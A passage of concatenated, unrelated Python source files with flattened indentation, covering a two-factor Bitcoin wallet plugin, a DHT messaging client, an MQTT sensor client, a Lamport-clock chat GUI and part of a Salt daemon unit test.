title = _('Restore 2FA wallet')
msg = ' '.join([
'You are going to restore a wallet protected with two-factor authentication.',
'Do you want to keep using two-factor authentication with this wallet,',
'or do you want to disable it, and have two master private keys in your wallet?'
])
choices = [('keep', 'Keep'), ('disable', 'Disable')]
f = lambda x: self.on_choice(wizard, seed, passphrase, x)
wizard.choice_dialog(choices=choices, message=msg, title=title, run_next=f)
def on_choice(self, wizard, seed, passphrase, x):
if x == 'disable':
f = lambda pw, encrypt: wizard.run('on_restore_pw', seed, passphrase, pw, encrypt)
wizard.request_password(run_next=f)
else:
self.create_keystore(wizard, seed, passphrase)
def on_restore_pw(self, wizard, seed, passphrase, password, encrypt_storage):
xprv1, xpub1, xprv2, xpub2 = self.xkeys_from_seed(seed, passphrase)
k1 = keystore.from_xprv(xprv1)
k2 = keystore.from_xprv(xprv2)
k1.add_seed(seed)
k1.update_password(None, password)
k2.update_password(None, password)
wizard.data['x1/'] = k1.dump()
wizard.data['x2/'] = k2.dump()
long_user_id, short_id = get_user_id(wizard.data)
xtype = xpub_type(xpub1)
xpub3 = make_xpub(get_signing_xpub(xtype), long_user_id)
k3 = keystore.from_xpub(xpub3)
wizard.data['x3/'] = k3.dump()
wizard.pw_args = WizardWalletPasswordSetting(password=password,
encrypt_storage=encrypt_storage,
storage_enc_version=StorageEncryptionVersion.USER_PASSWORD,
encrypt_keystore=bool(password))
wizard.terminate()
def create_remote_key(self, email, wizard):
xpub1 = wizard.data['x1/']['xpub']
xpub2 = wizard.data['x2/']['xpub']
# Generate third key deterministically.
long_user_id, short_id = get_user_id(wizard.data)
xtype = xpub_type(xpub1)
xpub3 = make_xpub(get_signing_xpub(xtype), long_user_id)
# secret must be sent by the server
try:
r = server.create(xpub1, xpub2, email)
except (socket.error, ErrorConnectingServer):
wizard.show_message('Server not reachable, aborting')
wizard.terminate()
return
except TrustedCoinException as e:
if e.status_code == 409:
r = None
else:
wizard.show_message(str(e))
return
if r is None:
otp_secret = None
else:
otp_secret = r.get('otp_secret')
if not otp_secret:
wizard.show_message(_('Error'))
return
_xpub3 = r['xpubkey_cosigner']
_id = r['id']
if short_id != _id:
wizard.show_message("unexpected trustedcoin short_id: expected {}, received {}"
.format(short_id, _id))
return
if xpub3 != _xpub3:
wizard.show_message("unexpected trustedcoin xpub3: expected {}, received {}"
.format(xpub3, _xpub3))
return
self.request_otp_dialog(wizard, short_id, otp_secret, xpub3)
def check_otp(self, wizard, short_id, otp_secret, xpub3, otp, reset):
if otp:
self.do_auth(wizard, short_id, otp, xpub3)
elif reset:
wizard.opt_bip39 = False
wizard.opt_ext = True
f = lambda seed, is_bip39, is_ext: wizard.run('on_reset_seed', short_id, seed, is_ext, xpub3)
wizard.restore_seed_dialog(run_next=f, test=self.is_valid_seed)
def on_reset_seed(self, wizard, short_id, seed, is_ext, xpub3):
f = lambda passphrase: wizard.run('on_reset_auth', short_id, seed, passphrase, xpub3)
wizard.passphrase_dialog(run_next=f) if is_ext else f('')
def do_auth(self, wizard, short_id, otp, xpub3):
try:
server.auth(short_id, otp)
except TrustedCoinException as e:
if e.status_code == 400: # invalid OTP
wizard.show_message(_('Invalid one-time password.'))
# ask again for otp
self.request_otp_dialog(wizard, short_id, None, xpub3)
else:
wizard.show_message(str(e))
wizard.terminate()
except Exception as e:
wizard.show_message(repr(e))
wizard.terminate()
else:
k3 = keystore.from_xpub(xpub3)
wizard.data['x3/'] = k3.dump()
wizard.data['use_trustedcoin'] = True
wizard.terminate()
def on_reset_auth(self, wizard, short_id, seed, passphrase, xpub3):
xprv1, xpub1, xprv2, xpub2 = self.xkeys_from_seed(seed, passphrase)
if (wizard.data['x1/']['xpub'] != xpub1 or
wizard.data['x2/']['xpub'] != xpub2):
wizard.show_message(_('Incorrect seed'))
return
r = server.get_challenge(short_id)
challenge = r.get('challenge')
message = 'TRUSTEDCOIN CHALLENGE: ' + challenge
def f(xprv):
rootnode = BIP32Node.from_xkey(xprv)
key = rootnode.subkey_at_private_derivation((0, 0)).eckey
sig = key.sign_message(message, True)
return base64.b64encode(sig).decode()
signatures = [f(x) for x in [xprv1, xprv2]]
r = server.reset_auth(short_id, challenge, signatures)
new_secret = r.get('otp_secret')
if not new_secret:
wizard.show_message(_('Request rejected by server'))
return
self.request_otp_dialog(wizard, short_id, new_secret, xpub3)
@hook
def get_action(self, storage):
if storage.get('wallet_type') != '2fa':
return
if not storage.get('x1/'):
return self, 'show_disclaimer'
if not storage.get('x2/'):
return self, 'show_disclaimer'
if not storage.get('x3/'):
return self, 'accept_terms_of_use'
|
dht_msg.py
|
import sys
import random
import requests
import binascii
import umsgpack
from ast import literal_eval
from future.moves.urllib.parse import urlencode
#from multiprocessing import Process as Thread, Event
from threading import Thread, Event
from storjkademlia.node import Node as KadNode
from pyp2p.lib import is_ip_valid, is_valid_port
from twisted.internet import defer
import json
import string
import binascii
try:
from Queue import Queue # py2
except ImportError:
from queue import Queue # py3
import time
import logging
dht_msg_endpoint = "http://185.61.148.22/dht_msg.php"
# dht_msg_endpoint = "http://localhost/dht_msg.php"
logging.basicConfig()
log = logging.getLogger(__name__)
LONG_POLLING = True
RESERVATION_TIMEOUT = (10 * 60) - 5
MUTEX_TIMEOUT = RESERVATION_TIMEOUT
ALIVE_TIMEOUT = (60 * 10) - 5
class DHTProtocol:
def __init__(self):
self.messages_received = None
class DHT:
def __init__(self, node_id=None, ip=None, port=0, password=None, network_id="default", debug=1, networking=1):
self.node_id = node_id or self.rand_str(20)
if sys.version_info >= (3, 0, 0):
if type(self.node_id) == str:
self.node_id = self.node_id.encode("ascii")
else:
if type(self.node_id) == unicode:
self.node_id = str(self.node_id)
self.node_id = binascii.hexlify(self.node_id).decode('utf-8')
self.password = password or self.rand_str(30)
self.ip = ip
self.port = port
self.network_id = network_id
self.check_interval = 3 # For slow connections, unfortunately.
self.last_check = 0
self.debug = debug
self.networking = networking
self.relay_links = {}
self.protocol = DHTProtocol()
self.is_registered = Event()
self.is_mutex_ready = Event()
self.is_neighbours_ready = Event()
self.handles = []
self.threads = []
self.running = 1
self.has_mutex = 0
self.neighbours = []
# Register a new "account."
if self.networking:
self.register(self.node_id, self.password)
self.is_registered.wait(5)
self.mutex_loop()
self.is_mutex_ready.wait(5)
self.alive_loop()
self.find_neighbours_loop()
self.is_neighbours_ready.wait(5)
assert(self.is_mutex_ready.is_set())
assert(self.is_registered.is_set())
self.message_handlers = set()
def stop(self):
self.running = 0
for handle in self.handles:
handle.close()
# handle.raw._fp.close()
def hook_queue(self, q):
self.protocol.messages_received = q
self.check_for_new_messages()
def retry_in_thread(self, f, args={"args": None}, check_interval=2):
def thread_loop(this_obj):
while 1:
try:
while not f(**args) and this_obj.running:
time.sleep(check_interval)
if not this_obj.running:
return
return
except Exception as e:
print("unknown exception")
print(e)
time.sleep(1)
t = Thread(target=thread_loop, args=(self,))
t.setDaemon(True)
self.threads.append(t)
t.start()
return t
def check_for_new_messages(self):
def do(args):
for msg in self.list(self.node_id, self.password):
self.protocol.messages_received.put(msg)
return 0
if LONG_POLLING:
self.retry_in_thread(do, check_interval=0.1)
else:
self.retry_in_thread(do, check_interval=2)
def mutex_loop(self):
def do(args):
# Requests a mutex from the server.
call = dht_msg_endpoint + "?call=get_mutex&"
call += urlencode({"node_id": self.node_id}) + "&"
call += urlencode({"password": self.password})
# Make API call.
ret = requests.get(call, timeout=5).text
if "1" in ret or "2" in ret:
self.has_mutex = int(ret)
self.is_mutex_ready.set()
return 0
self.retry_in_thread(do, check_interval=MUTEX_TIMEOUT)
def alive_loop(self):
def do(args):
# Requests a mutex from the server.
call = dht_msg_endpoint + "?call=last_alive&"
call += urlencode({"node_id": self.node_id}) + "&"
call += urlencode({"password": self.password})
# Make API call.
ret = requests.get(call, timeout=5)
return 0
self.retry_in_thread(do, check_interval=ALIVE_TIMEOUT)
def can_test_knode(self, id):
for neighbour in self.neighbours:
if neighbour.id == id:
if neighbour.can_test:
return 1
return 0
def has_testable_neighbours(self):
for neighbour in self.neighbours:
if neighbour.can_test:
return 1
return 0
def find_neighbours_loop(self):
def do(args):
# Requests a mutex from the server.
call = dht_msg_endpoint + "?call=find_neighbours&"
call += urlencode({"node_id": self.node_id}) + "&"
call += urlencode({"password": self.password}) + "&"
call += urlencode({"network_id": self.network_id})
# Make API call.
ret = requests.get(call, timeout=5).text
ret = json.loads(ret)
if type(ret) == dict:
ret = [ret]
# Convert to kademlia neighbours.
neighbours = []
for neighbour in ret:
if not is_ip_valid(neighbour["ip"]):
continue
neighbour["port"] = int(neighbour["port"])
if not is_valid_port(neighbour["port"]):
continue
knode = KadNode(
id=binascii.unhexlify(neighbour["id"].encode("ascii")),
ip=neighbour["ip"],
port=neighbour["port"],
can_test=int(neighbour["can_test"])
)
neighbours.append(knode)
self.neighbours = neighbours
self.is_neighbours_ready.set()
return 0
self.retry_in_thread(do, check_interval=ALIVE_TIMEOUT)
def get_neighbours(self):
return self.neighbours
def add_relay_link(self, dht):
node_id = binascii.hexlify(dht.get_id())
self.relay_links[node_id.decode("utf-8")] = dht
def debug_print(self, msg):
if self.debug:
print(str(msg))
def add_message_handler(self, handler):
self.message_handlers.add(handler)
def remove_transfer_request_handler(self, handler):
pass
def rand_str(self, length):
return ''.join(random.choice(string.digits + string.ascii_lowercase +
string.ascii_uppercase
) for i in range(length))
def register(self, node_id, password):
def do(node_id, password):
try:
# Registers a new node to receive messages.
call = dht_msg_endpoint + "?call=register&"
call += urlencode({"node_id": node_id}) + "&"
call += urlencode({"password": password}) + "&"
call += urlencode({"port": self.port}) + "&"
call += urlencode({"network_id": self.network_id})
if self.ip is not None:
call += "&" + urlencode({"ip": self.ip})
# Make API call.
ret = requests.get(call, timeout=5)
self.handles.append(ret)
if "success" not in ret.text:
return 0
self.is_registered.set()
return 1
except Exception as e:
print(e)
self.debug_print("Register timed out in DHT msg")
self.debug_print("DHT REGISTER FAILED")
return 0
mappings = {
"node_id": node_id,
"password": password
}
self.retry_in_thread(do, mappings)
def build_dht_response(self, msg):
msg = binascii.unhexlify(msg)
msg = umsgpack.unpackb(msg)
try:
str_types = [type(u""), type(b"")]
if type(msg) in str_types:
msg = literal_eval(msg)
except:
msg = str(msg)
return msg
def serialize_message(self, msg):
msg = umsgpack.packb(msg)
msg = binascii.hexlify(msg)
return msg
def async_dht_put(self, key, value):
d = defer.Deferred()
def do(args):
t = self.put(key, value, list_pop=0)
while t.isAlive():
time.sleep(1)
d.callback("success")
return 1
self.retry_in_thread(do)
return d
def async_dht_get(self, key):
d = defer.Deferred()
def do(args):
ret = self.list(node_id=key, list_pop=0, timeout=5)
if len(ret):
d.callback(ret[0])
else:
d.callback(None)
return 1
self.retry_in_thread(do)
return d
def put(self, node_id, msg, list_pop=1):
def do(node_id, msg):
if node_id in self.relay_links:
relay_link = self.relay_links[node_id]
msg = self.build_dht_response(self.serialize_message(msg))
relay_link.protocol.messages_received.put_nowait(msg)
return 1
try:
# Send a message directly to a node in the "DHT"
call = dht_msg_endpoint + "?call=put&"
call += urlencode({"dest_node_id": node_id}) + "&"
msg = self.serialize_message(msg)
call += urlencode({"msg": msg}) + "&"
call += urlencode({"node_id": self.node_id}) + "&"
call += urlencode({"password": self.password}) + "&"
call += urlencode({"list_pop": list_pop})
# Make API call.
ret = requests.get(call, timeout=5)
self.handles.append(ret)
if "success" not in ret.text:
return 0
return 1
except Exception as e:
# Reschedule call.
self.debug_print("DHT PUT TIMED OUT")
self.debug_print(e)
self.debug_print("Rescheduling DHT PUT")
self.debug_print("PUT FAILED")
return 0
mappings = {
"node_id": node_id,
"msg": msg
}
return self.retry_in_thread(do, mappings)
def list(self, node_id=None, password=None, list_pop=1, timeout=None):
if not self.networking:
return []
node_id = node_id or self.node_id
password = password or self.password
try:
# Get messages send to us in the "DHT"
call = dht_msg_endpoint + "?call=list&"
call += urlencode({"node_id": node_id}) + "&"
call += urlencode({"password": password}) + "&"
call += urlencode({"list_pop": list_pop})
# Make API call.
if timeout is None:
if LONG_POLLING:
timeout = None
else:
timeout = 4
ret = requests.get(call, timeout=timeout)
self.handles.append(ret)
content_gen = ret.iter_content()
messages = ret.text
messages = json.loads(messages)
# List.
if type(messages) == dict:
messages = [messages]
# Return a list of responses.
ret = []
if type(messages) == list:
for msg in messages:
dht_response = self.build_dht_response(msg)
ret.append(dht_response)
return ret
except Exception as e:
print("EXCEPTION IN DHT MSG LIST")
self.debug_print("Exception in dht msg list")
print(e)
return []
def direct_message(self, node_id, msg):
return self.send_direct_message(node_id, msg)
def relay_message(self, node_id, msg):
return self.send_direct_message(node_id, msg)
def repeat_relay_message(self, node_id, msg):
return self.send_direct_message(node_id, msg)
def async_direct_message(self, node_id, msg):
return self.send_direct_message(node_id, msg)
def send_direct_message(self, node_id, msg):
if sys.version_info >= (3, 0, 0):
if type(node_id) == bytes:
node_id = binascii.hexlify(node_id).decode("utf-8")
else:
if type(node_id) == str:
node_id = binascii.hexlify(node_id).decode("utf-8")
if type(node_id) != str:
node_id = node_id.decode("utf-8")
self.put(node_id, msg)
def get_id(self):
node_id = self.node_id
if sys.version_info >= (3, 0, 0):
if type(node_id) == str:
node_id = node_id.encode("ascii")
else:
if type(node_id) == unicode:
node_id = str(node_id)
return binascii.unhexlify(node_id)
def has_messages(self):
return not self.protocol.messages_received.empty()
def get_messages(self):
result = []
if self.has_messages():
while not self.protocol.messages_received.empty():
result.append(self.protocol.messages_received.get())
# Run handlers on messages.
old_handlers = set()
for received in result:
for handler in self.message_handlers:
expiry = handler(
self,
received
)
if expiry == -1:
old_handlers.add(handler)
# Expire old handlers.
for handler in old_handlers:
self.message_handlers.remove(handler)
return result
return result
if __name__ == "__main__":
#node1 = DHT()
#print(node1.get_id())
#print(node1.node_id)
pass
"""
node1 = DHT()
node2 = DHT()
node1.put(node2.node_id, "test")
running = 1
time.sleep(5)
node1.stop()
node2.stop()
"""
"""
#print(node2.protocol.messages_received.get())
#print(node2.get_messages())
while not node2.has_messages() and running:
for msg in node2.get_messages():
running = 0
print(msg)
print("No longer runnig")
"""
"""
#dht_node = DHT(node_id=b"\111" * 20, password="svymQQzF1j7FGmYf8fENs4mvRd")
dht_node = DHT(node_id=u"T", password="svymQQzF1j7FGmYf8fENs4mvRd")
x = [("a", 2), ("b!%--", 2)]
dht_node.put(dht_node.node_id, x)
print(dht_node.list(dht_node.node_id, dht_node.password))
exit()
print(dht_node.node_id)
print(dht_node.get_id())
print(type(dht_node.get_id()))
dht_node.send_direct_message(dht_node.node_id, u"test")
print(dht_node.list(dht_node.node_id, dht_node.password))
exit()
print(dht_node.node_id)
print(dht_node.password)
print(dht_node.list(dht_node.node_id, dht_node.password))
"""
|
client_ad_runner.py
|
import paho.mqtt.client as mqtt
from threading import Thread
from ast import literal_eval
import ADS1256
import config
from queue import Queue
from extract_data import run
class My_client_ad(Thread):
'''
Classe usada para representar um cliente ativo
Atributo-
--------
broker : ...
port : ...
topic : ...
client : ...
userdata : ...
msg : ...
Metodos-
-------
on_connect : manter a conexão e a inscrição do cliente ao tópico
on_message : responsavel pelo envio e requisição da menssagem
run : iniciar o cliente
'''
def __init__(self, broker, port, topic):
'''
-Construtor da classe para definir parametro inicias no momento da instancia-
Parametros:
broker : endereço do servidor broker.
port : porta para comunicação do broker.
topic : tópico para inscrição e publicação da menssagem.
'''
Thread.__init__(self)
self.broker = broker
self.port = port
self.topic = topic
self.q = Queue() # recursos de criação da fila para requisitar os dados na memoria
self.t1 = Thread(target=run, args=(self.q,))
def on_connect(self, client, userdata, flags, rc):
'''
-Determina o metodo de conexão do cliente, passando o tópico a ser inscrito-
Parametros:
client : objeto cliente
userdata : parametro de callbacks para atualização
flags : sinalizador do broker
rc : resultado da conexão
'''
client.subscribe(self.topic) # assinatura do tópico
def on_message(self, client, userdata, msg):
print("[MSG RECEBIDA] Topico: "+msg.topic+" / Mensagem: "+str(msg.payload.decode('utf-8')))
if msg.payload.decode('utf-8') == "on": # Verifica se a menssagem recebida para o inicio da leitura
self.t1.start() # inicia a leitura do dispositivo
print("leitura iniciada")
if msg.payload.decode("utf-8") == "off": # Verifica se a menssagem recebida para o inicio da leitura
self.t1.do_run=False #término da leitura do dispositivo
self.t1.join()
data = self.q.get()# armazena os dados na variavel data
self.t1 = Thread(target=run, args=(self.q,))
client.publish('request', str(data))# publica os dados ao tópico request
print('finalizado')
def run(self):
print("[STATUS] Inicializando MQTT...")
client = mqtt.Client('113')
client.on_connect = self.on_connect
client.on_message = self.on_message
client.connect(self.broker, self.port)
client.loop_forever()
if __name__ == "__main__":
my = My_client_ad('broker.emqx.io', 1883, 'ad')
my.start()
|
client.py
|
from email.utils import formatdate #required for formating date & time
from datetime import datetime #required to get current datetime for HTTP
from time import mktime,sleep #required for timestamp with zone
import tkinter #required for GUI
from tkinter import messagebox #required for alert box
from socket import AF_INET, socket, SOCK_STREAM #required for socket programming
from threading import Thread #required for multitherading
import random #genrate random number
import ast #converts a string containing a dictionary to an actual dictionary
def startTimer():
# Description
# The function runs as a seperate thread and its job is it increment timer
# every second and display the time continusly on the client window
# Input: NA
# Output: NA
global clock,quitClient #clock is an global variable; quitClient is to indicate if
# a client has decided to quit
msg_list.insert(tkinter.END,"Clock set to: "+ str(clock)) #display initial time
msg_list.see(tkinter.END) #set to new line
while quitClient == False: #timer should run until closed, hence infinite loop
sleep(1) #sleep for a second before incrementing the counter
clock = clock + 1 # increment the time counter
try:
logClock.delete(0,tkinter.END) #clears the window
#display the time on the client window continously
logClock.insert(tkinter.END,"Clock: "+ str(clock))
except RuntimeError:
break
def parseHTTPresponse(Httpmsg):
# Description
# The function parses the incoming HTTP response message from server
# and returns the payload;
# Input:
# Httpmsg-> HTTP encoded response message
# Output:
# status-> HTTP response message status
# query-> parsed payload in dictonary format
crlf = "\r\n" # Carriage return & Line feed for HTTP request message
status = 0 # Status of HTTP response message initialize
query = {} # dictionary to hold the payload of the HTTP response
ss = Httpmsg.split(crlf) # split the message based on the CRLF and store into a list
first_line = ss[0].split(" ") # read the first line of the HTTP response (to get status)
try:
if first_line[1] == '200': # if the status is 200 (OK)
status = 200 # store the status to return
# split the last line of payload based on delimiter && to
# fetch all elements of the payload and store into a list
# Ex: payload may contain: name=john&&message=hello
# so payload will have => [name=john, message=hello]
payload = ss[len(ss) - 1].split("&&")
# split each element of the list payload based on '='
# from the above example, the below dictionary query will have
# query={'name':'john','message':'hello'}
# Please note that if the original message contains =, blank will be sent
for item in payload:
left,right = item.split("=") # split based on '='
query.update({left:right}) # add new pair to dictionary
else:
status = 400 # update status (400= Bad request
except IndexError: # Check for Index error
pass; # This exception wont occur since HTTP message is coded by us
return status,query # return the status and dictionary payload
def encodeHTTP(method,query):
# Description:
# Given a dictionary of values and HTTP method(GET or POST),
# this function encodes the query into HTTP request
# Input:
# method-> HTTP method (POST or GET)
# query-> dictioanry pairs of data to be sent to the server
# Output
# HTTPmsg-> HTTP encoded message
space = " " # space to delimit HTTP request
url = "/" # start of the url (for POST its empty)
host1 = "127.0.0.1:5001" # host address (here its localhost)
version = "HTTP/1.1" #HTTP version
crlf = "\r\n" #carriage return and line feed used for line seperator for http request
user_agent = "python-client 1.0" # user agent, usign python client here
content_type = "text/plain" # content type is plain text (no file transfer supported)
now = datetime.now() # get current date and time
stamp = mktime(now.timetuple()) # convert local time to seconds since the Epoch
# formats the above time into HTTP timestamp format
date = (formatdate( timeval = stamp, localtime = False, usegmt = True ))
payload="" #initialize payload
# the following code converts dictionary(query) into string format as follows:
# query={'name':'john','message':'hello'}
# payload will have => name=john&&message=hello
for idx, item in enumerate(query):
if idx < len(query) - 1:
payload = payload+item+"="+query[item]+"&&" #add && as delimiter
else:
payload = payload+item+"="+query[item] #no need of delimiter && for last line
content_len = len(payload) # payload length
if method == 'GET': # if the method is GET,
url = url+'?'+payload # store payload in URL
# concatenate all HTTP headers stored above
HTTPmsg = method + space + url + space + version + crlf
HTTPmsg = HTTPmsg + "Host: " + host1 + crlf
HTTPmsg = HTTPmsg + "User-Agent: " + user_agent + crlf
HTTPmsg = HTTPmsg + "Content-Type: " + content_type + crlf
if method == 'GET':
# Content length is zero for GET request
HTTPmsg = HTTPmsg + "Content-Length: " + "0" + crlf
else:
# payload length is the content length for POST request
HTTPmsg = HTTPmsg + "Content-Length: " + str(content_len) + crlf
HTTPmsg = HTTPmsg + "Date: " + date + crlf + crlf
if method == 'POST': #if payload is POST
HTTPmsg = HTTPmsg + payload # store the payload in HTTP body
return HTTPmsg # return the HTTP encoded message
def send_msg(msg):
# Description:
# Sends the message to the server
# Input:
# msg-> HTTP Request message
# Output: NA
global serverConnected
try:
sock.send(bytes(msg, "utf8")) # send the message to server
except ConnectionResetError:
# This error occurs on server dserver disconnection
msg_list.insert(tkinter.END,"Server Disconnected")
serverConnected = False
msg_list.see(tkinter.END) #scrolls to the latest message
except ConnectionAbortedError: #server disconected
pass
def clientList():
# Description:
# This is a seperate thread which continously asks for client lists every 3 seconds
# Sends the request to server for client list every 3 seconds to choose
# from the list of clients; it has to be noted that selecting a random client
# and sending the local time to that client is performed in recieve thread
# Input: NA
# Output: NA
global quitClient, serverConnected
# loop untill client has not quit
while quitClient == False and serverConnected == True:
# fetch client list every 3 seconds; basically what it does is to
# prepare itself to send local time every 3 seconds by asking for real
# time client list from server
sleep(8)
HTTPmsg = encodeHTTP("GET",{'clients':'True'}) # encode HTTP query for client list
try:
send_msg(HTTPmsg) # send query to server
except RuntimeError:
return
def send(event=None):
# Description:
# This is called when user enters the client name; It has 3 functions:
# 1. registers client name on the server
# 2. starts the clock thread
# 3. starts the thread to get client list to eventually send local time
# Input: NA
# Output: NA
global clock,name,quitClient
if quitClient == True: # check if user has clicked on Quit
if serverConnected == True: # check if server is connected
#if server is still on & user has quit, inform the server about the quit
HTTPmsg = encodeHTTP("POST",{'quit':'True'}) #encode quit message
send_msg(HTTPmsg) # send the message to server
return # nothing more to do, so return
name = my_msg.get() # read user input
my_msg.set("") # Clears input field.
top.title(name) # change the client window title
HTTPmsg = encodeHTTP("POST",{'name':name}) #parse name into HTTP request
send_msg(HTTPmsg) # register the client name onto server
msg_list.insert(tkinter.END,"Your name is stored in server as "+name+". You can send messages now.") #display info to user
msg_list.see(tkinter.END) # scroll to the bottom
send_button.config(state="disabled") #disable send button
entry_field.config(state="disabled") # disable the text input box
# start the thread to clock the time
timer_thread = Thread(target=startTimer)
timer_thread.start()
# start the thread to get client list from server
clientlist_thread = Thread(target=clientList)
clientlist_thread.start()
def receive():
# Description:
# This function is called as new thread which cotinously listens to server
# and receives messaged from it untill either server quits or client quits.
# Here, the HTTP response from the server can be any of the following:
# 1. receive remote time from other clients and adjust local time based on
# Lampard clock
# 2. Upon geting list of active clients stored in the server,
# send the local time to a randomly selected client
# 3. receive Server disconnection notification
# Based on the above criteria, suitable actions are taken.
# Input: NA
# Output: NA
global clock, quitClient, serverConnected
while True: # continuosly receive data from server
try:
msg = sock.recv(buffer).decode("utf8") #receive HTTP response from server
if quitClient == True or serverConnected == False:
break #if server or client is killed, stop the loop
status,payload = parseHTTPresponse(msg) # parse the HTTP response message
try:
sender = payload['source'] # get the remote client name sending its time
remote_time = int(payload['time']) #type cast the time from string to int
msg_list.insert(tkinter.END,sender+"'s Time: "+ str(remote_time)) #display the remote time
msg_list.insert(tkinter.END,"Local time: "+ str(clock)) # display local time
# Lampard clock logic:
if remote_time >= clock: #if incoming time is greater than local time,
clock = remote_time + 1 # reset local time by adding 1 to remote time
#display new local time
msg_list.insert(tkinter.END,"Local clock reset to: "+ str(clock))
#update the local clock window
logClock.delete(0,tkinter.END) #scroll to bottom
logClock.insert(tkinter.END,"Clock: "+ str(clock))
else:
#if incoming time is lesser than local time, no time reset
msg_list.insert(tkinter.END,"No adjustment necessary")
msg_list.see(tkinter.END) #scroll to bottom
except KeyError: #upon getting client list, pick random client and send time
try:
clist = ast.literal_eval(payload['clist']) #converts a string containing a dictionary to an actual dictionary
clist.remove(name) # removes self from the list of clients
n = len(clist) #number of remaining clients
if n:
r = random.randint(0,n) # selects a random client index
try:
#encode the time and soirce into HTTP
msg_list.insert(tkinter.END,"Remote client selected: "+clist[r])
msg_list.insert(tkinter.END,"Local time sent: "+str(clock))
HttpMsg = encodeHTTP("POST",{'destination':clist[r],'clock': str(clock)})
send_msg(HttpMsg) #send the encoded message
except IndexError:
continue
except KeyError:
try: # Server disconnection notification
if payload['serv_quit'] == 'True':
serverConnected = False
msg_list.insert(tkinter.END,"Server disconnected; Communication not possible!")
msg_list.see(tkinter.END) #scroll to latest line
except KeyError:
pass
except ConnectionResetError:
break
def win_close(event=None):
# Description:
# Event handler called on the closing of window
# Input: NA
# Output: NA
global quitClient
quitClient = True #set quit to True
send() # call the send() method to notify server abt the disconnection
top.quit() # stop the main loop of tkinter GUI
if __name__ == "__main__":
# Description:
# Execution starts from here; All globals are declared here;
# The Tkinter GUI is initialized here
# The concurrent thread for listening to server is also started here
# Input:
# Output:
clock = random.randint(0,51) #initialize the clock to any number b/w 0 & 50
quitClient = False #quitClient initialized to false
name = "" #local client name
serverConnected = True #serverConnected initialied to true
top = tkinter.Tk() # create a root window handler
top.title("Client") # set the window titlw as client; updated once the user enters name
messages_frame = tkinter.Frame(top) #message frame to display text on the window
my_msg = tkinter.StringVar() # to set and get text from tkinter.Entry (input box)
my_msg.set("") # set it to blank at first
scrollbar = tkinter.Scrollbar(messages_frame) # To navigate through past messages.
# creates listbox to display the text entered by the user
msg_list = tkinter.Listbox(messages_frame, height=15, width=70, yscrollcommand=scrollbar.set)
scrollbar.pack(side=tkinter.RIGHT, fill=tkinter.Y) #set the scrol bar for first view
# configure list box geometry
msg_list.pack(side=tkinter.LEFT,expand=tkinter.YES, fill=tkinter.BOTH)
msg_list.pack()
logClock = tkinter.Listbox(messages_frame, height=15, width=25)
logClock.pack(side=tkinter.BOTTOM,expand=tkinter.YES, fill=tkinter.BOTH)
logClock.pack()
# configures the frame geometry allowing it to expand
messages_frame.pack(expand=tkinter.YES,fill=tkinter.BOTH)
#Label for input box
button_label = tkinter.Label(top, text="Enter name:")
button_label.pack()
# Input box for user input: we can set the input and read value off it using
# variable 'my_msg'; also the input font color is set to red
entry_field = tkinter.Entry(top, textvariable=my_msg, foreground="Red")
# calls the send() method on pressing enter
entry_field.bind("<Return>", send)
entry_field.pack()
# button to send the message; calls send() method
send_button = tkinter.Button(top, text="Send", command=send)
send_button.pack()
# button to quit; calls win
quit_button = tkinter.Button(top, text="Quit", command=win_close)
quit_button.pack()
# on closing the window; call the win_close() function
top.protocol("WM_DELETE_WINDOW", win_close)
# prompt to the user to register the client name on the server
msg_list.insert(tkinter.END, "Enter your name:")
msg_list.see(tkinter.END) #srcoll tp the latest message
host = "127.0.0.1" # server IP address; here its localhost
port = 5002 # port number of the server (hardcoded)
buffer = 1024 # buffer size
addr = (host, port) # IP address-port tuple
sock = socket(AF_INET, SOCK_STREAM) # creates a socket for TCP connection
try:
sock.connect(addr) # connects to the localhost server with its port
# starts new thread to listen to the server for messages contnously
receive_thread = Thread(target=receive)
receive_thread.start()
# start the GUI main loop
tkinter.mainloop()
except ConnectionRefusedError: # if server connection failed
top.destroy() # destroy the UI
# display message that no server is active
serv_msg = "Server not listening. Please run 'server.py' first and try again"
tkinter.messagebox.showinfo("Message",serv_msg) #alert box
print(serv_msg)
|
daemons_test.py
|
# -*- coding: utf-8 -*-
'''
:codeauthor: :email:`Bo Maryniuk <bo@suse.de>`
'''
# Import python libs
from __future__ import absolute_import
# Import Salt Testing libs
from salttesting import TestCase, skipIf
from salttesting.helpers import ensure_in_syspath
from salttesting.mock import patch, MagicMock, NO_MOCK, NO_MOCK_REASON
ensure_in_syspath('../')
# Import Salt libs
import integration
import multiprocessing
from salt.cli import daemons
class LoggerMock(object):
'''
Logger data collector
'''
def __init__(self):
'''
init
:return:
'''
self.reset()
def reset(self):
'''
Reset values
:return:
'''
self.messages = list()
def info(self, data):
'''
Collects the data from the logger of info type.
:param data:
:return:
'''
self.messages.append({'message': data, 'type': 'info'})
def warning(self, data):
'''
Collects the data from the logger of warning type.
:param data:
:return:
'''
self.messages.append({'message': data, 'type': 'warning'})
def has_message(self, msg, log_type=None):
'''
Check if log has message.
:param data:
:return:
'''
for data in self.messages:
if (data['type'] == log_type or not log_type) and data['message'].find(msg) > -1:
return True
return False
@skipIf(NO_MOCK, NO_MOCK_REASON)
class DaemonsStarterTestCase(TestCase, integration.SaltClientTestCaseMixIn):
'''
Unit test for the daemons starter classes.
'''
def _multiproc_exec_test(self, exec_test):
m_parent, m_child = multiprocessing.Pipe()
p_ = multiprocessing.Process(target=exec_test, args=(m_child,))
p_.start()
self.assertTrue(m_parent.recv())
p_.join()
def test_master_daemon_hash_type_verified(self):
'''
Verify if Master is verifying hash_type config option.
:return:
'''
def exec_test(child_pipe):
def _create_master():
'''
Create master instance
:return:
'''
obj = daemons.Master()
obj.config = {'user': 'dummy', 'hash_type': alg}
for attr in ['start_log_info', 'prepare', 'shutdown', 'master']:
setattr(obj, attr, MagicMock())
return obj
_logger = LoggerMock()
ret = True
with patch('salt.cli.daemons.check_user', MagicMock(return_value=True)):
with patch('salt.cli.daemons.log', _logger):
for alg in ['md5', 'sha1']:
_create_master().start()
ret = ret and _logger.messages \
and _logger.has_message('Do not use {alg}'.format(alg=alg),
log_type='warning')
_logger.reset()
for alg in ['sha224', 'sha256', 'sha384', 'sha512']:
_create_master().start()
ret = ret and _logger.messages \
and not _logger.has_message('Do not use ')
child_pipe.send(ret)
child_pipe.close()
self._multiproc_exec_test(exec_test)
def test_minion_daemon_hash_type_verified(self):
'''
Verify if Minion is verifying hash_type config option.
:return:
'''
def exec_test(child_pipe):
def _create_minion():
'''
Create minion instance
:return:
'''
obj = daemons.Minion()
